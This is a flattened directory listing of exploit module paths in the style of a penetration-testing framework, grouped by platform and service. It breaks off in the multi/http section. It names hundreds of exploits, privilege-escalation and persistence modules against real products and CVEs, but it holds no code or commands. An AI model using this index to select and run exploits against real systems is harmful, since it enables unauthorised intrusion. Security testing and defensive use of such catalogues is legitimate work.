exploit/apple_ios/email/mobilemail_libtiff | . | ssh (1) . | exploit/apple_ios/ssh/cydia_default_ssh | . | . | bsd (1) . | finger (1) . | exploit/bsd/finger/morris_fingerd_bof | . | . | bsdi (1) . | softcart (1) . | exploit/bsdi/softcart/mercantec_softcart | . | . | dialup (1) . | multi (1) . | login (1) . | exploit/dialup/multi/login/manyargs | . | . | . | firefox (1) . | local (1) . | exploit/firefox/local/exec_shellcode | . | . | freebsd (15) . | ftp (1) . | exploit/freebsd/ftp/proftp_telnet_iac | . | http (4) . | exploit/freebsd/http/citrix_dir_traversal_rce | exploit/freebsd/http/citrix_formssso_target_rce | exploit/freebsd/http/junos_phprc_auto_prepend_file | exploit/freebsd/http/watchguard_cmd_exec | . | local (5) . | exploit/freebsd/local/intel_sysret_priv_esc | exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc | exploit/freebsd/local/mmap | exploit/freebsd/local/rtld_execl_priv_esc | exploit/freebsd/local/watchguard_fix_corrupt_mail | . | misc (1) . | exploit/freebsd/misc/citrix_netscaler_soap_bof | . | samba (1) . | exploit/freebsd/samba/trans2open | . | tacacs (1) . | exploit/freebsd/tacacs/xtacacsd_report | . | telnet (1) . | exploit/freebsd/telnet/telnet_encrypt_keyid | . | webapp (1) . | exploit/freebsd/webapp/spamtitan_unauth_rce | . | . | hpux (1) . | lpd (1) . | exploit/hpux/lpd/cleanup_exec | . | . | irix (1) . | lpd (1) . | exploit/irix/lpd/tagprinter_exec | . | . | linux (486) . | antivirus (1) . | exploit/linux/antivirus/escan_password_exec | . | browser (1) . | exploit/linux/browser/adobe_flashplayer_aslaunch | . | fileformat (1) . | exploit/linux/fileformat/unrar_cve_2022_30333 | . | ftp (2) . | exploit/linux/ftp/proftp_sreplace | exploit/linux/ftp/proftp_telnet_iac | . | games (1) . | exploit/linux/games/ut2004_secure | . | http (304) . | exploit/linux/http/accellion_fta_getstatus_oauth | exploit/linux/http/acronis_cyber_infra_cve_2023_45249 | exploit/linux/http/advantech_switch_bash_env_exec | exploit/linux/http/airties_login_cgi_bof | exploit/linux/http/alcatel_omnipcx_mastercgi_exec | exploit/linux/http/alienvault_exec | exploit/linux/http/alienvault_sqli_exec | exploit/linux/http/apache_airflow_dag_rce | exploit/linux/http/apache_continuum_cmd_exec | exploit/linux/http/apache_couchdb_cmd_exec | exploit/linux/http/apache_druid_js_rce | exploit/linux/http/apache_hugegraph_gremlin_rce | exploit/linux/http/apache_nifi_h2_rce | exploit/linux/http/apache_ofbiz_deserialization | exploit/linux/http/apache_ofbiz_deserialization_soap | exploit/linux/http/apache_solr_backup_restore | exploit/linux/http/apache_spark_rce_cve_2022_33891 | exploit/linux/http/apache_superset_cookie_sig_rce | exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection | exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054 | exploit/linux/http/astium_sqli_upload | exploit/linux/http/asuswrt_lan_rce | exploit/linux/http/atutor_filemanager_traversal | exploit/linux/http/axis_app_install | exploit/linux/http/axis_srv_parhand_rce | exploit/linux/http/belkin_login_bof | exploit/linux/http/bitbucket_git_cmd_injection | exploit/linux/http/bludit_upload_images_exec | exploit/linux/http/cacti_unauthenticated_cmd_injection | exploit/linux/http/cayin_cms_ntp | exploit/linux/http/centreon_pollers_auth_rce | exploit/linux/http/centreon_sqli_exec | exploit/linux/http/centreon_useralias_exec | exploit/linux/http/cfme_manageiq_evm_upload_exec | exploit/linux/http/chamilo_unauth_rce_cve_2023_34960 | exploit/linux/http/chaos_rat_xss_to_rce | exploit/linux/http/cisco_asax_sfr_rce | exploit/linux/http/cisco_firepower_useradd | exploit/linux/http/cisco_hyperflex_file_upload_rce | exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec | exploit/linux/http/cisco_prime_inf_rce | exploit/linux/http/cisco_rv32x_rce | exploit/linux/http/cisco_rv340_lan | exploit/linux/http/cisco_rv_series_authbypass_and_rce | exploit/linux/http/cisco_ucs_cloupia_script_rce | exploit/linux/http/cisco_ucs_rce | exploit/linux/http/control_web_panel_login_cmd_exec | exploit/linux/http/cpi_tararchive_upload | exploit/linux/http/craftcms_unauth_rce_cve_2023_41892 | exploit/linux/http/crypttech_cryptolog_login_exec | exploit/linux/http/cve_2019_1663_cisco_rmi_rce | exploit/linux/http/dcos_marathon | exploit/linux/http/ddwrt_cgibin_exec | exploit/linux/http/denyall_waf_exec | exploit/linux/http/dlink_authentication_cgi_bof | exploit/linux/http/dlink_command_php_exec_noauth | exploit/linux/http/dlink_dcs931l_upload | exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution | exploit/linux/http/dlink_diagnostic_exec_noauth | exploit/linux/http/dlink_dir300_exec_telnet | exploit/linux/http/dlink_dir605l_captcha_bof | exploit/linux/http/dlink_dir615_up_exec | exploit/linux/http/dlink_dir850l_unauth_exec | exploit/linux/http/dlink_dsl2750b_exec_noauth | exploit/linux/http/dlink_dspw110_cookie_noauth_exec | exploit/linux/http/dlink_dspw215_info_cgi_bof | exploit/linux/http/dlink_dwl_2600_command_injection | exploit/linux/http/dlink_hedwig_cgi_bof | exploit/linux/http/dlink_hnap_bof | exploit/linux/http/dlink_hnap_header_exec_noauth | exploit/linux/http/dlink_hnap_login_bof | exploit/linux/http/dlink_upnp_exec_noauth | exploit/linux/http/dnalims_admin_exec | exploit/linux/http/docker_daemon_tcp | exploit/linux/http/dolibarr_cmd_exec | exploit/linux/http/dreambox_openpli_shell | exploit/linux/http/efw_chpasswd_exec | exploit/linux/http/elfinder_archive_cmd_injection | exploit/linux/http/empire_skywalker | exploit/linux/http/esva_exec | exploit/linux/http/eyesofnetwork_autodiscovery_rce | exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902 | exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747 | exploit/linux/http/f5_icall_cmd | exploit/linux/http/f5_icontrol_exec | exploit/linux/http/f5_icontrol_rce | exploit/linux/http/f5_icontrol_rest_ssrf_rce | exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800 | exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622 | exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061 | exploit/linux/http/foreman_openstack_satellite_code_exec | exploit/linux/http/fortinac_keyupload_file_write | exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684 | exploit/linux/http/fritzbox_echo_exec | exploit/linux/http/froxlor_log_path_rce | exploit/linux/http/geutebruck_cmdinject_cve_2021_335xx | exploit/linux/http/geutebruck_instantrec_bof | exploit/linux/http/geutebruck_testaction_exec | exploit/linux/http/github_enterprise_secret | exploit/linux/http/gitlist_exec | exploit/linux/http/glinet_unauth_rce_cve_2023_50445 | exploit/linux/http/glpi_htmlawed_php_injection | exploit/linux/http/goahead_ldpreload | exploit/linux/http/goautodial_3_rce_command_injection | exploit/linux/http/gpsd_format_string | exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec | exploit/linux/http/grandstream_ucm62xx_sendemail_rce | exploit/linux/http/gravcms_exec | exploit/linux/http/groundwork_monarch_cmd_exec | exploit/linux/http/h2_webinterface_rce | exploit/linux/http/hadoop_unauth_exec | exploit/linux/http/hikvision_cve_2021_36260_blind | exploit/linux/http/hp_system_management | exploit/linux/http/hp_van_sdn_cmd_inject | exploit/linux/http/huawei_hg532n_cmdinject | exploit/linux/http/ibm_drm_rce | exploit/linux/http/ibm_qradar_unauth_rce | exploit/linux/http/imperva_securesphere_exec | exploit/linux/http/ipfire_bashbug_exec | exploit/linux/http/ipfire_oinkcode_exec | exploit/linux/http/ipfire_pakfire_exec | exploit/linux/http/ipfire_proxy_exec | exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805 | exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893 | exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529 | exploit/linux/http/ivanti_sentry_misc_log_service | exploit/linux/http/jenkins_cli_deserialization | exploit/linux/http/kafka_ui_unauth_rce_cve_2023_52251 | exploit/linux/http/kaltura_unserialize_cookie_rce | exploit/linux/http/kaltura_unserialize_rce | exploit/linux/http/kibana_timelion_prototype_pollution_rce | exploit/linux/http/kibana_upgrade_assistant_telemetry_rce | exploit/linux/http/klog_server_authenticate_user_unauth_command_injection | exploit/linux/http/kloxo_sqli | exploit/linux/http/lexmark_faxtrace_settings | exploit/linux/http/librenms_addhost_cmd_inject | exploit/linux/http/librenms_collectd_cmd_inject | exploit/linux/http/lifesize_uvc_ping_rce | exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256 | exploit/linux/http/linksys_apply_cgi | exploit/linux/http/linksys_e1500_apply_exec | exploit/linux/http/linksys_themoon_exec | exploit/linux/http/linksys_wrt110_cmd_exec | exploit/linux/http/linksys_wrt160nv2_apply_exec | exploit/linux/http/linksys_wrt54gl_apply_exec | exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth | exploit/linux/http/linuxki_rce | exploit/linux/http/logsign_exec | exploit/linux/http/lucee_admin_imgprocess_file_write | exploit/linux/http/magento_xxe_to_glibc_buf_overflow | exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258 | exploit/linux/http/mailcleaner_exec | exploit/linux/http/majordomo_cmd_inject_cve_2023_50917 | exploit/linux/http/metabase_setup_token_rce | exploit/linux/http/microfocus_obr_cmd_injection | exploit/linux/http/microfocus_secure_messaging_gateway | exploit/linux/http/mida_solutions_eframework_ajaxreq_rce | exploit/linux/http/mobileiron_core_log4shell | exploit/linux/http/mobileiron_mdm_hessian_rce | exploit/linux/http/multi_ncc_ping_exec | exploit/linux/http/mutiny_frontend_upload | exploit/linux/http/mvpower_dvr_shell_exec | exploit/linux/http/nagios_xi_autodiscovery_webshell | exploit/linux/http/nagios_xi_chained_rce | exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo | exploit/linux/http/nagios_xi_configwizards_authenticated_rce | exploit/linux/http/nagios_xi_magpie_debug | exploit/linux/http/nagios_xi_mibs_authenticated_rce | exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce | exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce | exploit/linux/http/nagios_xi_snmptrap_authenticated_rce | exploit/linux/http/netgear_dgn1000_setup_unauth_exec | exploit/linux/http/netgear_dgn1000b_setup_exec | exploit/linux/http/netgear_dgn2200b_pppoe_exec | exploit/linux/http/netgear_dnslookup_cmd_exec | exploit/linux/http/netgear_r7000_cgibin_exec | exploit/linux/http/netgear_readynas_exec | exploit/linux/http/netgear_unauth_exec | exploit/linux/http/netgear_wnr2000_rce | exploit/linux/http/netis_unauth_rce_cve_2024_22729 | exploit/linux/http/netsweeper_webadmin_unixlogin | exploit/linux/http/nexus_repo_manager_el_injection | exploit/linux/http/nginx_chunked_size | exploit/linux/http/nuuo_nvrmini_auth_rce | exploit/linux/http/nuuo_nvrmini_unauth_rce | exploit/linux/http/op5_config_exec | exploit/linux/http/openfiler_networkcard_exec | exploit/linux/http/openmetadata_auth_bypass_rce | exploit/linux/http/opennms_horizon_authenticated_rce | exploit/linux/http/opentsdb_key_cmd_injection | exploit/linux/http/opentsdb_yrange_cmd_injection | exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276 | exploit/linux/http/oracle_ebs_rce_cve_2022_21587 | exploit/linux/http/pandora_fms_events_exec | exploit/linux/http/pandora_fms_exec | exploit/linux/http/pandora_fms_sqli | exploit/linux/http/pandora_ping_cmd_exec | exploit/linux/http/panos_op_cmd_exec | exploit/linux/http/panos_readsessionvars | exploit/linux/http/panos_telemetry_cmd_exec | exploit/linux/http/peercast_url | exploit/linux/http/php_imap_open_rce | exploit/linux/http/pineapp_ldapsyncnow_exec | exploit/linux/http/pineapp_livelog_exec | exploit/linux/http/pineapp_test_li_conn_exec | exploit/linux/http/pineapple_bypass_cmdinject | exploit/linux/http/pineapple_preconfig_cmdinject | exploit/linux/http/piranha_passwd_exec | exploit/linux/http/progress_flowmon_unauth_cmd_injection | exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection | exploit/linux/http/pulse_secure_cmd_exec | exploit/linux/http/pulse_secure_gzip_rce | exploit/linux/http/pyload_js2py_exec | exploit/linux/http/qnap_qcenter_change_passwd_exec | exploit/linux/http/qnap_qts_rce_cve_2023_47218 | exploit/linux/http/raidsonic_nas_ib5220_exec_noauth | exploit/linux/http/railo_cfml_rfi | exploit/linux/http/rancher_server | exploit/linux/http/ray_agent_job_rce | exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019 | exploit/linux/http/rconfig_ajaxarchivefiles_rce | exploit/linux/http/rconfig_vendors_auth_file_upload_rce | exploit/linux/http/realtek_miniigd_upnp_exec_noauth | exploit/linux/http/riverbed_netprofiler_netexpress_exec | exploit/linux/http/roxy_wi_exec | exploit/linux/http/saltstack_salt_api_cmd_exec | exploit/linux/http/saltstack_salt_wheel_async_rce | exploit/linux/http/samsung_srv_1670d_upload_exec | exploit/linux/http/seagate_nas_php_exec_noauth | exploit/linux/http/smt_ipmi_close_window_bof | exploit/linux/http/solarview_unauth_rce_cve_2023_23333 | exploit/linux/http/sonicwall_cve_2021_20039 | exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection | exploit/linux/http/sophos_wpa_iface_exec | exploit/linux/http/sophos_wpa_sblistpack_exec | exploit/linux/http/sourcegraph_gitserver_sshcmd | exploit/linux/http/spark_unauth_rce | exploit/linux/http/spring_cloud_gateway_rce | exploit/linux/http/suitecrm_log_file_rce | exploit/linux/http/supervisor_xmlrpc_exec | exploit/linux/http/symantec_messaging_gateway_exec | exploit/linux/http/symantec_web_gateway_exec | exploit/linux/http/symantec_web_gateway_file_upload | exploit/linux/http/symantec_web_gateway_lfi | exploit/linux/http/symantec_web_gateway_pbcontrol | exploit/linux/http/symantec_web_gateway_restore | exploit/linux/http/symmetricom_syncserver_rce | exploit/linux/http/synology_dsm_sliceupload_exec_noauth | exploit/linux/http/synology_dsm_smart_exec_auth | exploit/linux/http/terramaster_unauth_rce_cve_2020_35665 | exploit/linux/http/terramaster_unauth_rce_cve_2021_45837 | exploit/linux/http/terramaster_unauth_rce_cve_2022_24990 | exploit/linux/http/tiki_calendar_exec | exploit/linux/http/totolink_unauth_rce_cve_2023_30013 | exploit/linux/http/tp_link_ncxxx_bonjour_command_injection | exploit/linux/http/tp_link_sc2020n_authenticated_telnet_injection | exploit/linux/http/tr064_ntpserver_cmdinject | exploit/linux/http/traccar_rce_upload | exploit/linux/http/trend_micro_imsva_exec | exploit/linux/http/trendmicro_imsva_widget_exec | exploit/linux/http/trendmicro_sps_exec | exploit/linux/http/trendmicro_websecurity_exec | exploit/linux/http/trueonline_billion_5200w_rce | exploit/linux/http/trueonline_p660hn_v1_rce | exploit/linux/http/trueonline_p660hn_v2_rce | exploit/linux/http/ubiquiti_airos_file_upload | exploit/linux/http/ueb_api_rce | exploit/linux/http/unraid_auth_bypass_exec | exploit/linux/http/vap2500_tools_command_exec | exploit/linux/http/vcms_upload | exploit/linux/http/vestacp_exec | exploit/linux/http/vinchin_backup_recovery_cmd_inject | exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144 | exploit/linux/http/vmware_vcenter_analytics_file_upload | exploit/linux/http/vmware_vcenter_vsan_health_rce | exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce | exploit/linux/http/vmware_vrli_rce | exploit/linux/http/vmware_vrni_rce_cve_2023_20887 | exploit/linux/http/vmware_vrops_mgr_ssrf_rce | exploit/linux/http/vmware_workspace_one_access_cve_2022_22954 | exploit/linux/http/vmware_workspace_one_access_vmsa_2022_0011_chain | exploit/linux/http/wanem_exec | exploit/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318 | exploit/linux/http/wd_mycloud_multiupload_upload | exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection | exploit/linux/http/webcalendar_settings_exec | exploit/linux/http/webid_converter | exploit/linux/http/webmin_backdoor | exploit/linux/http/webmin_file_manager_rce | exploit/linux/http/webmin_package_updates_rce | exploit/linux/http/webmin_packageup_rce | exploit/linux/http/wepresent_cmd_injection | exploit/linux/http/wipg1000_cmd_injection | exploit/linux/http/xplico_exec | exploit/linux/http/zabbix_sqli | exploit/linux/http/zen_load_balancer_exec | exploit/linux/http/zenoss_showdaemonxmlconfig_exec | exploit/linux/http/zimbra_cpio_cve_2022_41352 | exploit/linux/http/zimbra_mboximport_cve_2022_27925 | exploit/linux/http/zimbra_unrar_cve_2022_30333 | exploit/linux/http/zimbra_xxe_rce | exploit/linux/http/zyxel_lfi_unauth_ssh_rce | exploit/linux/http/zyxel_parse_config_rce | exploit/linux/http/zyxel_ztp_rce | . | ids (2) . | exploit/linux/ids/alienvault_centerd_soap_exec | exploit/linux/ids/snortbopre | . | imap (1) . | exploit/linux/imap/imap_uw_lsub | . | local (91) . | exploit/linux/local/abrt_raceabrt_priv_esc | exploit/linux/local/abrt_sosreport_priv_esc | exploit/linux/local/af_packet_chocobo_root_priv_esc | exploit/linux/local/af_packet_packet_set_ring_priv_esc | exploit/linux/local/ansible_node_deployer | exploit/linux/local/apport_abrt_chroot_priv_esc | exploit/linux/local/apt_package_manager_persistence | exploit/linux/local/asan_suid_executable_priv_esc | exploit/linux/local/autostart_persistence | exploit/linux/local/bash_profile_persistence | exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc | exploit/linux/local/bpf_priv_esc | exploit/linux/local/bpf_sign_extension_priv_esc | exploit/linux/local/cpi_runrshell_priv_esc | exploit/linux/local/cron_persistence | exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe | exploit/linux/local/cve_2021_3493_overlayfs | exploit/linux/local/cve_2021_38648_omigod | exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec | exploit/linux/local/cve_2022_0847_dirtypipe | exploit/linux/local/cve_2022_0995_watch_queue | exploit/linux/local/cve_2022_1043_io_uring_priv_esc | exploit/linux/local/cve_2023_0386_overlayfs_priv_esc | exploit/linux/local/desktop_privilege_escalation | exploit/linux/local/diamorphine_rootkit_signal_priv_esc | exploit/linux/local/docker_cgroup_escape | exploit/linux/local/docker_daemon_privilege_escalation | exploit/linux/local/docker_privileged_container_escape | exploit/linux/local/docker_privileged_container_kernel_escape | exploit/linux/local/docker_runc_escape | exploit/linux/local/exim4_deliver_message_priv_esc | exploit/linux/local/f5_create_user | exploit/linux/local/glibc_ld_audit_dso_load_priv_esc | exploit/linux/local/glibc_origin_expansion_priv_esc | exploit/linux/local/glibc_realpath_priv_esc | exploit/linux/local/glibc_tunables_priv_esc | exploit/linux/local/hp_smhstart | exploit/linux/local/hp_xglance_priv_esc | exploit/linux/local/juju_run_agent_priv_esc | exploit/linux/local/kloxo_lxsuexec | exploit/linux/local/ktsuss_suid_priv_esc | exploit/linux/local/lastore_daemon_dbus_priv_esc | exploit/linux/local/libuser_roothelper_priv_esc | exploit/linux/local/motd_persistence | exploit/linux/local/nested_namespace_idmap_limit_priv_esc | exploit/linux/local/netfilter_nft_set_elem_init_privesc | exploit/linux/local/netfilter_priv_esc_ipv4 | exploit/linux/local/netfilter_xtables_heap_oob_write_priv_esc | exploit/linux/local/network_manager_vpnc_username_priv_esc | exploit/linux/local/ntfs3g_priv_esc | exploit/linux/local/omniresolve_suid_priv_esc | exploit/linux/local/overlayfs_priv_esc | exploit/linux/local/pihole_remove_commands_lpe | exploit/linux/local/pkexec | exploit/linux/local/polkit_dbus_auth_bypass | exploit/linux/local/progress_flowmon_sudo_privesc_2024 | exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024 | exploit/linux/local/ptrace_sudo_token_priv_esc | exploit/linux/local/ptrace_traceme_pkexec_helper | exploit/linux/local/rc_local_persistence | exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc | exploit/linux/local/rds_rds_page_copy_user_priv_esc | exploit/linux/local/recvmmsg_priv_esc | exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc | exploit/linux/local/runc_cwd_priv_esc | exploit/linux/local/saltstack_salt_minion_deployer | exploit/linux/local/service_persistence | exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc | exploit/linux/local/sock_sendpage | exploit/linux/local/sophos_wpa_clear_keys | exploit/linux/local/su_login | exploit/linux/local/sudo_baron_samedit | exploit/linux/local/sudoedit_bypass_priv_esc | exploit/linux/local/systemtap_modprobe_options_priv_esc | exploit/linux/local/tomcat_rhel_based_temp_priv_esc | exploit/linux/local/tomcat_ubuntu_log_init_priv_esc | exploit/linux/local/ubuntu_enlightenment_mount_priv_esc | exploit/linux/local/udev_netlink | exploit/linux/local/ueb_bpserverd_privesc | exploit/linux/local/ufo_privilege_escalation | exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc | exploit/linux/local/vmware_alsa_config | exploit/linux/local/vmware_mount | exploit/linux/local/vmware_workspace_one_access_certproxy_lpe | exploit/linux/local/vmware_workspace_one_access_cve_2022_22960 | exploit/linux/local/vmwgfx_fd_priv_esc | exploit/linux/local/yum_package_manager_persistence | exploit/linux/local/zimbra_postfix_priv_esc | exploit/linux/local/zimbra_slapper_priv_esc | exploit/linux/local/zpanel_zsudo | exploit/linux/local/zyxel_suid_cp_lpe | . | misc (41) . | exploit/linux/misc/accellion_fta_mpipe2 | exploit/linux/misc/aerospike_database_udf_cmd_exec | exploit/linux/misc/asus_infosvr_auth_bypass_exec | exploit/linux/misc/cisco_ios_xe_rce | exploit/linux/misc/cisco_rv340_sslvpn | exploit/linux/misc/cve_2020_13160_anydesk | exploit/linux/misc/cve_2021_38647_omigod | exploit/linux/misc/gld_postfix | exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce | exploit/linux/misc/hikvision_rtsp_bof | exploit/linux/misc/hp_data_protector_cmd_exec | exploit/linux/misc/hp_jetdirect_path_traversal | exploit/linux/misc/hp_nnmi_pmd_bof | exploit/linux/misc/hp_vsa_login_bof | exploit/linux/misc/hplip_hpssd_exec | exploit/linux/misc/ib_inet_connect | exploit/linux/misc/ib_jrd8_create_database | exploit/linux/misc/ib_open_marker_file | exploit/linux/misc/ib_pwd_db_aliased | exploit/linux/misc/igel_command_injection | exploit/linux/misc/jenkins_java_deserialize | exploit/linux/misc/jenkins_ldap_deserialize | exploit/linux/misc/lprng_format_string | exploit/linux/misc/mongod_native_helper | exploit/linux/misc/nagios_nrpe_arguments | exploit/linux/misc/netcore_udp_53413_backdoor | exploit/linux/misc/netsupport_manager_agent | exploit/linux/misc/nimbus_gettopologyhistory_cmd_exec | exploit/linux/misc/novell_edirectory_ncp_bof | exploit/linux/misc/opennms_java_serialize | exploit/linux/misc/qnap_transcode_server | exploit/linux/misc/quest_pmmasterd_bof | exploit/linux/misc/saltstack_salt_unauth_rce | exploit/linux/misc/sercomm_exec | exploit/linux/misc/tplink_archer_a7_c7_lan_rce | exploit/linux/misc/ueb9_bpserverd | exploit/linux/misc/unidata_udadmin_auth_bypass | exploit/linux/misc/unidata_udadmin_password_stack_overflow | exploit/linux/misc/zabbix_server_exec | exploit/linux/misc/zyxel_ike_decoder_rce_cve_2023_28771 | exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce | . | mysql (2) . | exploit/linux/mysql/mysql_yassl_getname | exploit/linux/mysql/mysql_yassl_hello | . | pop3 (1) . | exploit/linux/pop3/cyrus_pop3d_popsubfolders | . | postgres (1) . | exploit/linux/postgres/postgres_payload | . | pptp (1) . | exploit/linux/pptp/poptop_negative_read | . | proxy (1) . | exploit/linux/proxy/squid_ntlm_authenticate | . | redis (2) . | exploit/linux/redis/redis_debian_sandbox_escape | exploit/linux/redis/redis_replication_cmd_exec | . | samba (5) . | exploit/linux/samba/chain_reply | exploit/linux/samba/is_known_pipename | exploit/linux/samba/lsa_transnames_heap | exploit/linux/samba/setinfopolicy_heap | exploit/linux/samba/trans2open | . | smtp (4) . | exploit/linux/smtp/apache_james_exec | exploit/linux/smtp/exim4_dovecot_exec | exploit/linux/smtp/exim_gethostbyname_bof | exploit/linux/smtp/haraka | . | snmp (2) . | exploit/linux/snmp/awind_snmp_exec | exploit/linux/snmp/net_snmpd_rw_access | . | ssh (15) . | exploit/linux/ssh/ceragon_fibeair_known_privkey | exploit/linux/ssh/cisco_ucs_scpuser | exploit/linux/ssh/exagrid_known_privkey | exploit/linux/ssh/f5_bigip_known_privkey | exploit/linux/ssh/ibm_drm_a3user | exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey | exploit/linux/ssh/mercurial_ssh_exec | exploit/linux/ssh/microfocus_obr_shrboadmin | exploit/linux/ssh/quantum_dxi_known_privkey | exploit/linux/ssh/quantum_vmpro_backdoor | exploit/linux/ssh/solarwinds_lem_exec | exploit/linux/ssh/symantec_smg_ssh | exploit/linux/ssh/vmware_vdp_known_privkey | exploit/linux/ssh/vmware_vrni_known_privkey | exploit/linux/ssh/vyos_restricted_shell_privesc | . | telnet (2) . | exploit/linux/telnet/netgear_telnetenable | exploit/linux/telnet/telnet_encrypt_keyid | . | upnp (5) . | exploit/linux/upnp/belkin_wemo_upnp_exec | exploit/linux/upnp/dlink_dir859_exec_ssdpcgi | exploit/linux/upnp/dlink_dir859_subscribe_exec | exploit/linux/upnp/dlink_upnp_msearch_exec | exploit/linux/upnp/miniupnpd_soap_bof | . | . | mainframe (1) . | ftp (1) . | exploit/mainframe/ftp/ftp_jcl_creds | . | . | multi (458) . | browser (49) . | exploit/multi/browser/adobe_flash_hacking_team_uaf | exploit/multi/browser/adobe_flash_nellymoser_bof | exploit/multi/browser/adobe_flash_net_connection_confusion | exploit/multi/browser/adobe_flash_opaque_background_uaf | exploit/multi/browser/adobe_flash_pixel_bender_bof | exploit/multi/browser/adobe_flash_shader_drawing_fill | exploit/multi/browser/adobe_flash_shader_job_overflow | exploit/multi/browser/adobe_flash_uncompress_zlib_uaf | exploit/multi/browser/chrome_array_map | exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation | exploit/multi/browser/chrome_jscreate_sideeffect | exploit/multi/browser/chrome_object_create | exploit/multi/browser/chrome_simplifiedlowering_overflow | exploit/multi/browser/firefox_escape_retval | exploit/multi/browser/firefox_jit_use_after_free | exploit/multi/browser/firefox_pdfjs_privilege_escalation | exploit/multi/browser/firefox_proto_crmfrequest | exploit/multi/browser/firefox_proxy_prototype | exploit/multi/browser/firefox_queryinterface | exploit/multi/browser/firefox_svg_plugin | exploit/multi/browser/firefox_tostring_console_injection | exploit/multi/browser/firefox_webidl_injection | exploit/multi/browser/firefox_xpi_bootstrapped_addon | exploit/multi/browser/itms_overflow | exploit/multi/browser/java_atomicreferencearray | exploit/multi/browser/java_calendar_deserialize | exploit/multi/browser/java_getsoundbank_bof | exploit/multi/browser/java_jre17_driver_manager | exploit/multi/browser/java_jre17_exec | exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl | exploit/multi/browser/java_jre17_jaxws | exploit/multi/browser/java_jre17_jmxbean | exploit/multi/browser/java_jre17_jmxbean_2 | exploit/multi/browser/java_jre17_method_handle | exploit/multi/browser/java_jre17_provider_skeleton | exploit/multi/browser/java_jre17_reflection_types | exploit/multi/browser/java_rhino | exploit/multi/browser/java_rmi_connection_impl | exploit/multi/browser/java_setdifficm_bof | exploit/multi/browser/java_signed_applet | exploit/multi/browser/java_storeimagearray | exploit/multi/browser/java_trusted_chain | exploit/multi/browser/java_verifier_field_access | exploit/multi/browser/mozilla_compareto | exploit/multi/browser/mozilla_navigatorjava | exploit/multi/browser/msfd_rce_browser | exploit/multi/browser/opera_configoverwrite | exploit/multi/browser/opera_historysearch | exploit/multi/browser/qtjava_pointer | . | elasticsearch (2) . | exploit/multi/elasticsearch/script_mvel_rce | exploit/multi/elasticsearch/search_groovy_script | . | fileformat (16) . | exploit/multi/fileformat/adobe_u3d_meshcont | exploit/multi/fileformat/archive_tar_arb_file_write | exploit/multi/fileformat/evince_cbt_cmd_injection | exploit/multi/fileformat/ghostscript_failed_restore | exploit/multi/fileformat/ghostscript_format_string_cve_2024_29510 | exploit/multi/fileformat/gitlens_local_config_exec | exploit/multi/fileformat/js_unpacker_eval_injection | exploit/multi/fileformat/libreoffice_logo_exec | exploit/multi/fileformat/libreoffice_macro_exec | exploit/multi/fileformat/maple_maplet | exploit/multi/fileformat/nodejs_js_yaml_load_code_exec | exploit/multi/fileformat/office_word_macro | exploit/multi/fileformat/peazip_command_injection | exploit/multi/fileformat/swagger_param_inject | exploit/multi/fileformat/visual_studio_vsix_exec | exploit/multi/fileformat/zip_slip | . | ftp (2) . | exploit/multi/ftp/pureftpd_bash_env_exec | exploit/multi/ftp/wuftpd_site_exec_format | . | gdb (1) . | exploit/multi/gdb/gdb_server_exec | . | hams (1) . | exploit/multi/hams/steamed | . | http (308) . | exploit/multi/http/activecollab_chat | exploit/multi/http/adobe_coldfusion_rce_cve_2023_26360 | exploit/multi/http/agent_tesla_panel_rce | exploit/multi/http/ajaxplorer_checkinstall_exec | exploit/multi/http/apache_activemq_upload_jsp | exploit/multi/http/apache_apisix_api_default_token_rce | exploit/multi/http/apache_commons_text4shell | exploit/multi/http/apache_couchdb_erlang_rce | exploit/multi/http/apache_druid_cve_2023_25194 | exploit/multi/http/apache_flink_jar_upload_exec | exploit/multi/http/apache_jetspeed_file_upload | exploit/multi/http/apache_mod_cgi_bash_env_exec | exploit/multi/http/apache_nifi_processor_rce | exploit/multi/http/apache_normalize_path_rce | exploit/multi/http/apache_ofbiz_forgot_password_directory_traversal | exploit/multi/http/apache_rocketmq_update_config | exploit/multi/http/apache_roller_ognl_injection | exploit/multi/http/apprain_upload_exec | exploit/multi/http/atlassian_confluence_namespace_ognl_injection | exploit/multi/http/atlassian_confluence_rce_cve_2023_22515 | exploit/multi/http/atlassian_confluence_rce_cve_2023_22527 | 